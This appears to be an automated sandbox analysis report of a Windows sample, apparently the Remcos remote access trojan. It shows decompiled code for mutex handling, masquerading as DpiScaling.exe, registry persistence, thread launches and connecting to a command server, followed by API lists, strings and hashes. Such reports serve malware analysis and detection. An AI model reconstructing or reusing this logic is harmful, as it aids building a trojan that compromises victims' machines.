                                    								} while (_t423 != _t462);
                                    								__eflags = _t240 - _t448;
                                    								if(__eflags != 0) {
                                    									_t244 = L00401F95(L00401E49(_t477, _t448, __eflags, 9));
                                    									_t246 = L00401F95(L00401E49(0x46c578, _t448, __eflags, 0x30));
                                    									_t448 =  *_t244;
                                    									L00401EFA(0x46c530,  *_t244, _t244, E0041805B( &_v780,  *_t244, _t246));
                                    									L00401EF0();
                                    									_t477 = 0x46c578;
                                    								}
                                    							}
                                    							__eflags = _v776 - _t462;
                                    							if(_v776 != _t462) {
                                    								L00431F00(_t462,  &_v524, _t462, 0x208);
                                    								_t121 = E00402489();
                                    								_t122 = L00401F95(0x46c560);
                                    								_t449 = L00401F95(0x46c518);
                                    								L00410A30(_t124, "exepath",  &_v524, 0x208, _t122, _t121);
                                    								_t501 = _t499 + 0x20;
                                    								L00409DC9(_t272, 0x46c500,  &_v524);
                                    								_t465 = 0x46c578;
                                    								goto L47;
                                    							} else {
                                    								__eflags =  *0x46bb01;
                                    								if(__eflags == 0) {
                                    									L00409DC9(_t272, 0x46c500, "C:\Windows\SysWOW64\DpiScaling.exe");
                                    								} else {
                                    									_t229 = L00401F95(L00401E49(_t477, _t448, __eflags, 0x1e));
                                    									_t231 = L00401F95(L00401E49(_t477, _t448, __eflags, 0xc));
                                    									_t233 = L00401F95(L00401E49(0x46c578, _t448, __eflags, 9));
                                    									__eflags =  *_t229;
                                    									__eflags =  *_t231;
                                    									_t477 = 0x46c578;
                                    									_t235 = L00401F95(L00401E49(0x46c578, _t448,  *_t231, 0xa));
                                    									L0040A987( *_t233, L00401F95(L00401E49(0x46c578, _t448, __eflags, 0x30)), _t235, ((_t232 & 0xffffff00 |  *_t229 != 0x00000000) & 0 | __eflags != 0x00000000) & 0x000000ff, (_t232 & 0xffffff00 |  *_t229 != 0x00000000) & 0x000000ff);
                                    									_t499 = _t499 + 0xc;
                                    									_t272 = 1;
                                    									_t462 = 0;
                                    								}
                                    								_t210 = E00402489();
                                    								_t452 = 2;
                                    								_t394 =  ~(0 | __eflags > 0x00000000) | (_t210 + 0x00000001) * _t452;
                                    								_push(_t394);
                                    								_v780 = _t394;
                                    								_t486 = E0042F4C6(_t394, (_t210 + 1) * _t452 >> 0x20, _t477, __eflags);
                                    								__eflags = _t486;
                                    								if(_t486 == 0) {
                                    									_t486 = _t462;
                                    								} else {
                                    									L00431F00(_t462, _t486, _t462, _v780);
                                    									_t499 = _t499 + 0xc;
                                    								}
                                    								_t214 = L00401EEB(0x46c500);
                                    								_t455 = _t486 - _t214;
                                    								__eflags = _t455;
                                    								_t467 = 2;
                                    								do {
                                    									_t397 =  *_t214 & 0x0000ffff;
                                    									 *(_t214 + _t455) = _t397;
                                    									_t214 = _t214 + _t467;
                                    									__eflags = _t397;
                                    								} while (_t397 != 0);
                                    								_push(_t397);
                                    								_t215 = E00402489();
                                    								_t216 = L00401F95(0x46c560);
                                    								_t217 = E00402489();
                                    								E00410C80(L00401F95(0x46c518), __eflags, "exepath", _t486, 2 + _t217 * 2, _t216, _t215); // executed
                                    								E0042F4CF(_t486);
                                    								_t501 = _t499 + 0x1c;
                                    								_t465 = 0x46c578;
                                    								L00401E49(0x46c578, _t219, __eflags, 0xd);
                                    								_t449 = "0";
                                    								__eflags = L0040EAD9(__eflags);
                                    								if(__eflags == 0) {
                                    									L47:
                                    									_push(_t272);
                                    									_t129 = L00401F95(L00401E49(_t465, _t449, __eflags, 0x34));
                                    									_t502 = _t501 - 0x18;
                                    									E00402084(_t272, _t502, _t129);
                                    									_push("licence");
                                    									_t450 = L00401F95(0x46c518); // executed
                                    									E00410AA7(0x46c518, _t131); // executed
                                    									_t497 = _t502 + 0x20;
                                    									_t135 = L00436769(_t133, L00401F95(L00401E49(_t465, _t131, __eflags, 0x28)));
                                    									 *0x46bb03 = _t135;
                                    									__eflags = _t135 - 2;
                                    									if(_t135 != 2) {
                                    										__eflags = _t135 - _t272;
                                    										if(__eflags == 0) {
                                    											_t388 = 0;
                                    											__eflags = 0;
                                    											goto L51;
                                    										}
                                    									} else {
                                    										_t388 = _t272;
                                    										L51:
                                    										L00418F59(_t272, _t388, _t450);
                                    										__eflags = 0;
                                    										CreateThread(0, 0,  &M00418D28, 0, 0, 0);
                                    									}
                                    									_t137 = L00401F95(L00401E49(_t465, _t450, __eflags, 0x37));
                                    									_t139 = L00401F95(L00401E49(_t465, _t450, __eflags, 0x10));
                                    									_t141 = L00401F95(L00401E49(_t465, _t450, __eflags, 0xf));
                                    									__eflags =  *_t137;
                                    									_t471 = 0x46c578;
                                    									_t144 = L00436769(_t142, L00401F95(L00401E49(0x46c578, _t450,  *_t137, 0x36)));
                                    									_t146 = L00401F95(L00401E49(0x46c578, _t450, __eflags, 0x11));
                                    									E0040846D(_t139,  *_t141 & 0x000000ff,  *_t139 & 0x000000ff, L00401F95(L00401E49(0x46c578, _t450, __eflags, 0x31)), _t146, _t144, (_t140 & 0xffffff00 | __eflags != 0x00000000) & 0x000000ff); // executed
                                    									__eflags =  *((intOrPtr*)(L00401F95(L00401E49(0x46c578, _t450, __eflags, 0x14)))) - 1;
                                    									if(__eflags != 0) {
                                    										_t461 = CreateThread;
                                    									} else {
                                    										_t199 = 2;
                                    										_t485 = E0042F218(_t450, 0x46c578, __eflags, _t199);
                                    										 *_t485 = 0;
                                    										_t386 = L00401E49(0x46c578, _t450, __eflags, 0x35);
                                    										_t203 = L00401F95(_t386);
                                    										_t461 = CreateThread;
                                    										__eflags =  *_t203;
                                    										 *((char*)(_t485 + 1)) = _t386 & 0xffffff00 | __eflags != 0x00000000;
                                    										CreateThread(0, 0, 0x415938, _t485, 0, 0);
                                    										_t471 = 0x46c578;
                                    									}
                                    									__eflags =  *((intOrPtr*)(L00401F95(L00401E49(_t471, _t450, __eflags, 0x16)))) - 1;
                                    									if(__eflags == 0) {
                                    										_t193 = 2;
                                    										_t484 = E0042F218(_t450, _t471, __eflags, _t193);
                                    										 *_t484 = 1;
                                    										_t382 = L00401E49(0x46c578, _t450, __eflags, 0x35);
                                    										_t196 = L00401F95(_t382);
                                    										__eflags =  *_t196;
                                    										__eflags = 0;
                                    										 *((char*)(_t484 + 1)) = _t382 & 0xffffff00 |  *_t196 != 0x00000000;
                                    										CreateThread(0, 0, 0x415938, _t484, 0, 0);
                                    										_t471 = 0x46c578;
                                    									}
                                    									__eflags =  *((intOrPtr*)(L00401F95(L00401E49(_t471, _t450, __eflags, 0x23)))) - 1;
                                    									if(__eflags == 0) {
                                    										 *0x46ba75 = 1;
                                    										_t185 = L00401F95(L00401E49(_t471, _t450, __eflags, 0x25));
                                    										_t187 = L00401F95(L00401E49(0x46c578, _t450, __eflags, 0x26));
                                    										_t450 =  *_t185;
                                    										L00401EFA(0x46c0e0,  *_t185, _t185, E0041800F( &_v780,  *_t185, _t187));
                                    										L00401EF0();
                                    										__eflags = 0;
                                    										CreateThread(0, 0, 0x401bcd, 0, 0, 0);
                                    										_t471 = 0x46c578;
                                    									}
                                    									__eflags =  *((intOrPtr*)(L00401F95(L00401E49(_t471, _t450, __eflags, 0x2b)))) - 1;
                                    									if(__eflags == 0) {
                                    										_t471 = L00401F95(L00401E49(_t471, _t450, __eflags, 0x2c));
                                    										_t182 = L00436769(_t180, L00401F95(L00401E49(0x46c578, _t450, __eflags, 0x2d)));
                                    										__eflags =  *_t471;
                                    										_t450 = _t182;
                                    										__eflags =  *_t471 != 0;
                                    										L0040A679(_t182);
                                    									}
                                    									_t160 = E00416D9E( &_v772, _t461, __eflags); // executed
                                    									L00401EFA(0x46c584, _t450, _t471, _t160);
                                    									_t360 =  &_v776;
                                    									L00401EF0();
                                    									_t163 =  *0x46bd14;
                                    									_t269 = 0;
                                    									__eflags = _t163;
                                    									if(_t163 != 0) {
                                    										 *_t163(0); // executed
                                    									}
                                    									CreateThread(_t269, _t269, E0040D0B5, _t269, _t269, _t269); // executed
                                    									__eflags =  *0x46bd4e;
                                    									if( *0x46bd4e != 0) {
                                    										CreateThread(_t269, _t269, 0x40fac7, _t269, _t269, _t269);
                                    									}
                                    									__eflags =  *0x46bd4f;
                                    									if( *0x46bd4f != 0) {
                                    										CreateThread(_t269, _t269, 0x40ffe5, _t269, _t269, _t269);
                                    									}
                                    									_t165 =  *0x46a9d0; // 0x1
                                    									_t166 = _t165 - _t269;
                                    									__eflags = _t166;
                                    									if(__eflags == 0) {
                                    										goto L71;
                                    									} else {
                                    										__eflags = _t166 - 1;
                                    										if(__eflags == 0) {
                                    											_push("Administrator");
                                    											goto L72;
                                    										}
                                    									}
                                    									goto L73;
                                    								} else {
                                    									_t224 = L00401E49(0x46c578, "0", __eflags, 0xd);
                                    									_t506 = _t501 - 0x18;
                                    									_t449 = _t224;
                                    									E004172DA(_t506, _t224);
                                    									_t226 = L0040CE44(__eflags);
                                    									_t501 = _t506 + 0x18;
                                    									__eflags = _t226 - _t272;
                                    									if(__eflags != 0) {
                                    										goto L47;
                                    									} else {
                                    										_t272 = 3;
                                    										goto L45;
                                    									}
                                    								}
                                    							}
                                    						}
                                    					} else {
                                    						_v780 = 0;
                                    						_t265 = E00410885(L00401F95(0x46c518), "WD",  &_v780);
                                    						__eflags = _t265;
                                    						if(_t265 != 0) {
                                    							L00410CE2(L00401F95(0x46c518), __eflags, "WD");
                                    							L0040FD95();
                                    							L71:
                                    							_push("User");
                                    							L72:
                                    							L004075C2(_t269, _t497 - 0x18, "Access level: ", _t461, __eflags, E00402084(_t269,  &_v776));
                                    							E00402084(_t269, _t497 - 4, "[Info]");
                                    							L00416C80(_t269, _t461);
                                    							_t360 =  &_v784;
                                    							L00401FC7(); // executed
                                    							L73:
                                    							E00411929(); // executed
                                    							asm("int3");
                                    							_push(_t471);
                                    							_t481 = _t360 + 0x68;
                                    							L0040D515(_t481);
                                    							_t284 = _t481;
                                    							 *_t284 = 0x460788;
                                    							 *_t284 = 0x460744;
                                    							return E004304F6(_t284);
                                    						} else {
                                    							goto L8;
                                    						}
                                    					}
                                    				} else {
                                    					__eflags =  *((char*)(__ecx + 1)) - 0x6c;
                                    					if(__eflags != 0) {
                                    						goto L6;
                                    					} else {
                                    						__eax =  *(__ecx + 2) & 0x000000ff;
                                    						__eflags = __al;
                                    						if(__eflags != 0) {
                                    							goto L6;
                                    						} else {
                                    							_push(__ecx);
                                    							_push(__ecx);
                                    							__ecx =  &_v700;
                                    							__eax = E0040D544( &_v700, __edx, __eflags, "license_code.txt", 2);
                                    							__ecx = 0x46c578;
                                    							__ecx = L00401E49(0x46c578, __edx, __eflags, 0x34);
                                    							__edx = __eax;
                                    							__ecx =  &_v720;
                                    							__eax = L0040E8BB( &_v720, __edx, __eflags);
                                    							__ecx =  &_v720;
                                    							__eax = E0040D4F5( &_v720, __edx, __eflags);
                                    							__ecx =  &_v720;
                                    							L74();
                                    							__ecx =  &_v744;
                                    							L00401FC7() = 0;
                                    							__eax = 1;
                                    							__eflags = 1;
                                    							L5:
                                    							return _t97;
                                    						}
                                    					}
                                    				}
                                    			}
                                    0x0040c2be
                                    0x0040c2d4
                                    0x0040c2d9
                                    0x0040c2dc
                                    0x0040c2e1
                                    0x0040c2eb
                                    0x0040c2f0
                                    0x0040c2fa
                                    0x0040c303
                                    0x0040c308
                                    0x0040c30c
                                    0x0040c315
                                    0x0040c31a
                                    0x0040c320
                                    0x0040c387
                                    0x0040c387
                                    0x0040c3a5
                                    0x0040c3a8
                                    0x0040c3ca
                                    0x0040c3d0
                                    0x0040c3d8
                                    0x0040c3e1
                                    0x0040c3ea
                                    0x0040c3f9
                                    0x0040c3fe
                                    0x0040c405
                                    0x0040c416
                                    0x0040c418
                                    0x0040c41f
                                    0x0040c426
                                    0x0040c42b
                                    0x0040c42d
                                    0x0040c434
                                    0x0040c43a
                                    0x0040c462
                                    0x0040c46d
                                    0x0040c477
                                    0x0040c479
                                    0x0040c47b
                                    0x0040c483
                                    0x0040c48a
                                    0x0040c48a
                                    0x0040c4a7
                                    0x0040c4a9
                                    0x0040c4b0
                                    0x0040c4b2
                                    0x0040c4bc
                                    0x0040c4be
                                    0x0040c4c3
                                    0x0040c4d5
                                    0x0040c4dc
                                    0x0040c4e4
                                    0x0040c4e6
                                    0x0040c4e9
                                    0x0040c4ef
                                    0x0040c4f5
                                    0x0040c4fa
                                    0x0040c87d
                                    0x0040c881
                                    0x0040c886
                                    0x00000000
                                    0x0040c500
                                    0x0040c500
                                    0x0040c510
                                    0x0040c516
                                    0x0040c51b
                                    0x0040c526
                                    0x0040c52b
                                    0x0040c534
                                    0x0040c539
                                    0x0040c544
                                    0x0040c54d
                                    0x0040c552
                                    0x0040c55b
                                    0x0040c564
                                    0x0040c55d
                                    0x0040c55d
                                    0x0040c55d
                                    0x0040c569
                                    0x0040c56e
                                    0x0040c573
                                    0x0040c575
                                    0x0040c579
                                    0x0040c579
                                    0x0040c57e
                                    0x0040c583
                                    0x0040c587
                                    0x0040c592
                                    0x0040c599
                                    0x0040c59c
                                    0x0040c59e
                                    0x0040c5a4
                                    0x0040c5a6
                                    0x0040c5ac
                                    0x0040c5d0
                                    0x0040c5d2
                                    0x0040c5d7
                                    0x0040c5d8
                                    0x0040c5da
                                    0x0040c5dc
                                    0x0040c5dc
                                    0x0040c5ae
                                    0x0040c5ae
                                    0x0040c5af
                                    0x0040c5b5
                                    0x0040c5b8
                                    0x0040c5ba
                                    0x0040c5ba
                                    0x0040c5b8
                                    0x0040c5ac
                                    0x0040c5a4
                                    0x0040c59c
                                    0x0040c5f1
                                    0x0040c5f4
                                    0x0040c5f6
                                    0x0040c5f6
                                    0x0040c611
                                    0x0040c62a
                                    0x0040c62d
                                    0x0040c644
                                    0x0040c647
                                    0x0040c65e
                                    0x0040c661
                                    0x0040c674
                                    0x0040c677
                                    0x0040c684
                                    0x0040c689
                                    0x0040c689
                                    0x0040c68c
                                    0x0040c68c
                                    0x0040c68f
                                    0x0040c692
                                    0x0040c692
                                    0x0040c697
                                    0x0040c69b
                                    0x0040c6a8
                                    0x0040c6bd
                                    0x0040c6c2
                                    0x0040c6d5
                                    0x0040c6de
                                    0x0040c6e3
                                    0x0040c6e3
                                    0x0040c69b
                                    0x0040c6e8
                                    0x0040c6ec
                                    0x0040c89c
                                    0x0040c8ab
                                    0x0040c8b3
                                    0x0040c8d1
                                    0x0040c8d3
                                    0x0040c8d8
                                    0x0040c8e8
                                    0x0040c8ed
                                    0x00000000
                                    0x0040c6f2
                                    0x0040c6f2
                                    0x0040c6f9
                                    0x0040c78f
                                    0x0040c6ff
                                    0x0040c70a
                                    0x0040c71c
                                    0x0040c731
                                    0x0040c736
                                    0x0040c73e
                                    0x0040c744
                                    0x0040c75c
                                    0x0040c776
                                    0x0040c77d
                                    0x0040c780
                                    0x0040c781
                                    0x0040c781
                                    0x0040c799
                                    0x0040c7a3
                                    0x0040c7ab
                                    0x0040c7ad
                                    0x0040c7ae
                                    0x0040c7b7
                                    0x0040c7ba
                                    0x0040c7bc
                                    0x0040c7ce
                                    0x0040c7be
                                    0x0040c7c4
                                    0x0040c7c9
                                    0x0040c7c9
                                    0x0040c7d5
                                    0x0040c7de
                                    0x0040c7de
                                    0x0040c7e0
                                    0x0040c7e1
                                    0x0040c7e1
                                    0x0040c7e4
                                    0x0040c7e8
                                    0x0040c7ea
                                    0x0040c7ea
                                    0x0040c7ef
                                    0x0040c7f7
                                    0x0040c7ff
                                    0x0040c80a
                                    0x0040c829
                                    0x0040c82f
                                    0x0040c834
                                    0x0040c837
                                    0x0040c840
                                    0x0040c845
                                    0x0040c851
                                    0x0040c853
                                    0x0040c8f2
                                    0x0040c8f2
                                    0x0040c8fe
                                    0x0040c903
                                    0x0040c909
                                    0x0040c90e
                                    0x0040c91d
                                    0x0040c91f
                                    0x0040c924
                                    0x0040c938
                                    0x0040c943
                                    0x0040c949
                                    0x0040c94b
                                    0x0040c951
                                    0x0040c953
                                    0x0040c955
                                    0x0040c955
                                    0x00000000
                                    0x0040c955
                                    0x0040c94d
                                    0x0040c94d
                                    0x0040c957
                                    0x0040c957
                                    0x0040c95c
                                    0x0040c968
                                    0x0040c968
                                    0x0040c975
                                    0x0040c987
                                    0x0040c999
                                    0x0040c99e
                                    0x0040c9a3
                                    0x0040c9c0
                                    0x0040c9d2
                                    0x0040c9f1
                                    0x0040ca09
                                    0x0040ca0b
                                    0x0040ca54
                                    0x0040ca0d
                                    0x0040ca0f
                                    0x0040ca16
                                    0x0040ca22
                                    0x0040ca29
                                    0x0040ca2b
                                    0x0040ca30
                                    0x0040ca36
                                    0x0040ca48
                                    0x0040ca4b
                                    0x0040ca4d
                                    0x0040ca4d
                                    0x0040ca6a
                                    0x0040ca6c
                                    0x0040ca70
                                    0x0040ca77
                                    0x0040ca81
                                    0x0040ca88
                                    0x0040ca8a
                                    0x0040ca8f
                                    0x0040ca95
                                    0x0040caa1
                                    0x0040caa4
                                    0x0040caa6
                                    0x0040caa6
                                    0x0040cabb
                                    0x0040cabd
                                    0x0040cac3
                                    0x0040cad0
                                    0x0040cae5
                                    0x0040caea
                                    0x0040cafd
                                    0x0040cb06
                                    0x0040cb0b
                                    0x0040cb17
                                    0x0040cb19
                                    0x0040cb19
                                    0x0040cb2e
                                    0x0040cb30
                                    0x0040cb49
                                    0x0040cb58
                                    0x0040cb5d
                                    0x0040cb60
                                    0x0040cb63
                                    0x0040cb66
                                    0x0040cb66
                                    0x0040cb6f
                                    0x0040cb7a
                                    0x0040cb7f
                                    0x0040cb83
                                    0x0040cb88
                                    0x0040cb8d
                                    0x0040cb8f
                                    0x0040cb91
                                    0x0040cb94
                                    0x0040cb94
                                    0x0040cba0
                                    0x0040cba2
                                    0x0040cba9
                                    0x0040cbb5
                                    0x0040cbb5
                                    0x0040cbb7
                                    0x0040cbbe
                                    0x0040cbca
                                    0x0040cbca
                                    0x0040cbcc
                                    0x0040cbd1
                                    0x0040cbd1
                                    0x0040cbd3
                                    0x00000000
                                    0x0040cbd5
                                    0x0040cbd5
                                    0x0040cbd8
                                    0x0040cbda
                                    0x00000000
                                    0x0040cbda
                                    0x0040cbd8
                                    0x00000000
                                    0x0040c859
                                    0x0040c85d
                                    0x0040c862
                                    0x0040c865
                                    0x0040c869
                                    0x0040c86e
                                    0x0040c873
                                    0x0040c876
                                    0x0040c878
                                    0x00000000
                                    0x0040c87a
                                    0x0040c87c
                                    0x00000000
                                    0x0040c87c
                                    0x0040c878
                                    0x0040c853
                                    0x0040c6ec
                                    0x0040c43c
                                    0x0040c440
                                    0x0040c453
                                    0x0040c45a
                                    0x0040c45c
                                    0x0040cbef
                                    0x0040cbf9
                                    0x0040cbfe
                                    0x0040cbfe
                                    0x0040cc03
                                    0x0040cc17
                                    0x0040cc26
                                    0x0040cc2b
                                    0x0040cc33
                                    0x0040cc37
                                    0x0040cc3c
                                    0x0040cc3c
                                    0x0040cc41
                                    0x0040cc42
                                    0x0040cc43
                                    0x0040cc48
                                    0x0040cc4d
                                    0x0040e032
                                    0x0040c177
                                    0x0040c183
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0040c45c
                                    0x0040c322
                                    0x0040c322
                                    0x0040c326
                                    0x00000000
                                    0x0040c328
                                    0x0040c328
                                    0x0040c32c
                                    0x0040c32e
                                    0x00000000
                                    0x0040c330
                                    0x0040c330
                                    0x0040c331
                                    0x0040c339
                                    0x0040c33d
                                    0x0040c344
                                    0x0040c34e
                                    0x0040c355
                                    0x0040c357
                                    0x0040c35b
                                    0x0040c360
                                    0x0040c364
                                    0x0040c369
                                    0x0040c36d
                                    0x0040c372
                                    0x0040c37b
                                    0x0040c37d
                                    0x0040c37d
                                    0x0040c37e
                                    0x0040c384
                                    0x0040c384
                                    0x0040c32e
                                    0x0040c326

                                    APIs
                                    • OpenMutexA.KERNEL32 ref: 0040C471
                                    • WaitForSingleObject.KERNEL32(00000000,0000EA60), ref: 0040C483
                                    • CloseHandle.KERNEL32(00000000), ref: 0040C48A
                                    • CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000000,0000000E), ref: 0040C4E9
                                    • GetLastError.KERNEL32 ref: 0040C4EF
                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\SysWOW64\DpiScaling.exe,00000104), ref: 0040C510
                                      • Part of subcall function 0040E8BB: __EH_prolog.LIBCMT ref: 0040E8C0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Mutex$CloseCreateErrorFileH_prologHandleLastModuleNameObjectOpenSingleWait
                                    • String ID: (32 bit)$ (64 bit)$Access level: $Administrator$C:\Windows\SysWOW64\DpiScaling.exe$Exe$Exe$Inj$ProductName$Remcos$Remcos_Mutex_Inj$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Sept-AITAB5$Software\$User$[Info]$exepath$licence$license_code.txt$origmsc
                                    • API String ID: 1247502528-626796739
                                    • Opcode ID: 703840713e08c2232aace42187958cdef69e432d48f940163b25cfb5a8ccc0cc
                                    • Instruction ID: 97ecaa49e5e083256040f844ff0fd3ae96e39466cf8f0e182fdc5e320802d438
                                    • Opcode Fuzzy Hash: 703840713e08c2232aace42187958cdef69e432d48f940163b25cfb5a8ccc0cc
                                    • Instruction Fuzzy Hash: 5432F460B443516BDA1577729CA6B3F26898B8170CF04053FB542BB2E3EE7C9D4583AE
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 85%
                                    			E00411929() {
                                    				struct _SECURITY_ATTRIBUTES* _v8;
                                    				char _v20;
                                    				char _v32;
                                    				char _v56;
                                    				char _v80;
                                    				char _v104;
                                    				char _v128;
                                    				char _v140;
                                    				void* _v163;
                                    				char _v164;
                                    				char _v188;
                                    				char _v212;
                                    				char _v236;
                                    				char _v260;
                                    				char _v284;
                                    				char _v308;
                                    				char _v332;
                                    				char _v356;
                                    				char _v380;
                                    				char _v404;
                                    				char _v428;
                                    				char _v452;
                                    				char _v476;
                                    				char _v500;
                                    				char _v524;
                                    				char _v548;
                                    				char _v572;
                                    				char _v596;
                                    				char _v620;
                                    				char _v644;
                                    				char _v668;
                                    				char _v692;
                                    				char _v716;
                                    				char _v740;
                                    				char _v764;
                                    				char _v788;
                                    				char _v812;
                                    				char _v836;
                                    				char _v860;
                                    				char _v884;
                                    				char _v908;
                                    				char _v932;
                                    				char _v956;
                                    				char _v980;
                                    				char _v1004;
                                    				char _v1028;
                                    				char _v1052;
                                    				char _v1076;
                                    				char _v1100;
                                    				char _v1124;
                                    				char _v1148;
                                    				char _v1172;
                                    				char _v1196;
                                    				char _v1220;
                                    				char _v1244;
                                    				char _v1268;
                                    				char _v1292;
                                    				char _v1316;
                                    				char _v1340;
                                    				char _v1364;
                                    				char _v1388;
                                    				char _v1412;
                                    				char _v1436;
                                    				char _v2436;
                                    				signed int _t166;
                                    				void* _t168;
                                    				long _t172;
                                    				void* _t174;
                                    				signed char _t178;
                                    				void* _t184;
                                    				short _t195;
                                    				void* _t197;
                                    				void* _t198;
                                    				void* _t200;
                                    				long _t204;
                                    				short _t209;
                                    				void* _t210;
                                    				void* _t212;
                                    				void* _t225;
                                    				void* _t233;
                                    				void* _t234;
                                    				void* _t237;
                                    				intOrPtr* _t238;
                                    				void* _t241;
                                    				void* _t242;
                                    				void* _t243;
                                    				void* _t246;
                                    				void* _t248;
                                    				void* _t251;
                                    				void* _t252;
                                    				void* _t253;
                                    				void* _t254;
                                    				void* _t256;
                                    				void* _t257;
                                    				void* _t258;
                                    				intOrPtr* _t353;
                                    				void* _t367;
                                    				void* _t369;
                                    				void* _t371;
                                    				void* _t373;
                                    				void* _t375;
                                    				long _t379;
                                    				void* _t380;
                                    				void* _t381;
                                    				char* _t401;
                                    				void* _t616;
                                    				void* _t625;
                                    				void* _t677;
                                    				signed short _t681;
                                    				struct _SECURITY_ATTRIBUTES* _t684;
                                    				void* _t694;
                                    				void* _t695;
                                    				void* _t696;
                                    				void* _t697;
                                    				void* _t698;
                                    				void* _t699;
                                    				void* _t700;
                                    				void* _t701;
                                    				void* _t703;
                                    				void* _t704;
                                    				void* _t708;
                                    				void* _t709;
                                    				void* _t710;
                                    				void* _t711;
                                    				void* _t712;
                                    				long _t714;
                                    
                                    				_push(_t380);
                                    				E004020D5(_t380,  &_v104);
                                    				L00416FDC( &_v236, _t616);
                                    				E004020D5(_t380,  &_v1436);
                                    				_t677 = 0x46c578;
                                    				_t166 = L00436769(_t164, L00401F95(L00401E49(0x46c578, _t616, _t712, 0x29)));
                                    				if(_t166 != 0) {
                                    					_t379 = _t166 * 0x3e8;
                                    					_t714 = _t379;
                                    					Sleep(_t379);
                                    				}
                                    				_t695 = _t694 - 0x18;
                                    				E00402084(_t380, _t695, 0x4657ec);
                                    				_t168 = L00401E49(_t677, _t616, _t714, 0);
                                    				_t696 = _t695 - 0x18;
                                    				E004020EC(_t380, _t696, _t616, _t714, _t168);
                                    				E00417478( &_v32, _t616);
                                    				_t697 = _t696 + 0x30;
                                    				_t684 = 0;
                                    				_v8 = 0;
                                    				_t381 = 0;
                                    				L00401E49(_t677, _t616, _t714, 0x3a);
                                    				_t617 = 0x45f6bc;
                                    				_t172 = L0040EAD9(_t714);
                                    				_t715 = _t172;
                                    				if(_t172 != 0) {
                                    					L00401E49(_t677, 0x45f6bc, _t715, 0x3a);
                                    					_t367 = E00402489();
                                    					_t369 = L00401F95(L00401E49(_t677, 0x45f6bc, _t715, 0x3a));
                                    					L00401E49(_t677, 0x45f6bc, _t715, 0x39);
                                    					_t371 = E00402489();
                                    					_t373 = L00401F95(L00401E49(_t677, _t617, _t715, 0x39));
                                    					L00401E49(_t677, _t617, _t715, 0x38);
                                    					_t375 = E00402489();
                                    					L00401F95(L00401E49(_t677, _t617, _t715, 0x38));
                                    					_t617 = _t375;
                                    					L00404882(_t375, _t373, _t371, _t369, _t367);
                                    					_t697 = _t697 + 0x10;
                                    					_t684 = 0;
                                    				}
                                    				L4:
                                    				_t698 = _t697 - 0x18;
                                    				E00402084(_t381, _t698, 0x4657f0);
                                    				_t174 = L00401E49( &_v32, _t617, _t715, _t381);
                                    				_t699 = _t698 - 0x18;
                                    				E004020EC(_t381, _t699, _t617, _t715, _t174);
                                    				E00417478( &_v20, _t617);
                                    				_t697 = _t699 + 0x30;
                                    				L00401E49( &_v20, _t617, _t715, 2);
                                    				_t618 = "0";
                                    				_t178 = L00405A6F("0");
                                    				asm("sbb al, al");
                                    				 *0x46bae0 =  ~_t178 + 1;
                                    				E0040498B(0x46c780);
                                    				if(_t684 >= 0 || E004021F5( &_v32) > 1) {
                                    					_t718 =  *0x46c781 - 1;
                                    					_t401 =  &_v104;
                                    					if( *0x46c781 != 1) {
                                    						_push(0x45f6bc);
                                    					} else {
                                    						_push(" (TLS)");
                                    					}
                                    					L00405A0B(_t381, _t401);
                                    					_t700 = _t697 - 0x18;
                                    					_t184 = L00401E49( &_v20, _t618, _t718, 1);
                                    					_t617 = L00402F93(_t381,  &_v128, E00405343(_t381,  &_v56, L004075E6( &_v80, "Connecting to ", _t718, L00401E49( &_v20, _t618, _t718, 0)), _t677, _t718, 0x4657f0), _t718, _t184);
                                    					L00402F93(_t381, _t700, _t188, _t718,  &_v104);
                                    					_t701 = _t700 - 0x14;
                                    					E00402084(_t381, _t701, "[Info]");
                                    					L00416C80(_t381, _t677);
                                    					_t697 = _t701 + 0x30;
                                    					L00401FC7();
                                    					L00401FC7();
                                    					L00401FC7();
                                    					_t684 = _v8;
                                    				}
                                    				_t195 = 2;
                                    				 *0x46bacc = _t195;
                                    				_t197 = L00401F95(L00401E49( &_v20, _t617, _t718, 0));
                                    				__imp__#52(_t197); // executed
                                    				_t719 = _t197;
                                    				if(_t197 != 0) {
                                    					E004324E0(0x46bad0,  *((intOrPtr*)( *((intOrPtr*)(_t197 + 0xc)))),  *((short*)(_t197 + 0xa)));
                                    					_t209 = L00436769(_t207, L00401F95(L00401E49( &_v20, _t617, _t719, 1)));
                                    					__imp__#9();
                                    					_t697 = _t697 + 0xc - 0x10;
                                    					 *0x46bace = _t209;
                                    					asm("movsd");
                                    					asm("movsd");
                                    					asm("movsd");
                                    					asm("movsd");
                                    					_t210 = E00404A08(_t617, _t209); // executed
                                    					_t720 = _t210;
                                    					if(_t210 != 0) {
                                    						_t703 = _t697 - 0x18;
                                    						_t212 = L00401E49( &_v20, _t617, _t720, 1);
                                    						_t625 = L00402F93(_t381,  &_v56, E00405343(_t381,  &_v188, L004075E6( &_v212, "Connected to  ", _t720, L00401E49( &_v20, _t617, _t720, 0)), 0x46c780, _t720, 0x4657f0), _t720, _t212);
                                    						L00402F93(_t381, _t703, _t625, _t720,  &_v104);
                                    						_t704 = _t703 - 0x14;
                                    						E00402084(_t381, _t704, "[Info]");
                                    						L00416C80(_t381, 0x46c780);
                                    						L00401FC7();
                                    						L00401FC7();
                                    						L00401FC7();
                                    						L00404E9A(0x46c780, 0xa, 0);
                                    						_v164 = 0;
                                    						asm("stosd");
                                    						_v8 = 1;
                                    						asm("stosd");
                                    						asm("stosd");
                                    						asm("stosd");
                                    						asm("stosd");
                                    						_t225 = L00416EFA(0x46c780);
                                    						_push(_t625);
                                    						L00411912( &_v164, "%I64u", _t225);
                                    						E00407350(_t381,  &_v128, _t625, _t720, 0x46c3b0);
                                    						L0043BACE( &_v128,  *0x46a9d0,  &_v140, 0xa);
                                    						E004020EC(_t381,  &_v80, _t625, _t720, L00401E49(0x46c578, _t625, _t720, 1));
                                    						_t233 = E00402489();
                                    						_t234 = L00401F95(0x46c560);
